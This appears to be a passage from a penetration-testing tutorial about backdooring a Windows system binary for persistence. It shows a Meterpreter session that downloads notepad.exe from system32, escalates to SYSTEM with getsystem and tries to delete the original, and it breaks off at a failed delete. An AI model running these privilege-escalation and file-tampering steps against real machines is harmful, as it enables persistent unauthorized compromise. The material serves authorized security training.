Becoming TrustedInstaller
Another way to gain persistence is to backdoor a service binary. So, let's try to backdoor a Windows binary in the Windows 10 target machine.
How to do it...
- First, we will download Â
notepad.exe
to our Kali machine using thedownload
command:
meterpreter > pwd C:\Windows\system32 meterpreter > download notepad.exe [*] Downloading: notepad.exe -> notepad.exe [*] Downloaded 227.00 KiB of 227.00 KiB (100.0%): notepad.exe -> notepad.exe [*] download : notepad.exe -> notepad.exe meterpreter >
Note
Use the pwd
command to make sure you are on the C:\Windows\system32
directory where notepad.exe
is located. If not, use the cd
command to change to the proper directory (don't forget to use double backslashes): Â C:\\Windows\\system32
.
- Now that we have a copy of the binary, let's try to remove the original:
meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > rm notepad.exe [-] stdapi_fs_delete_file...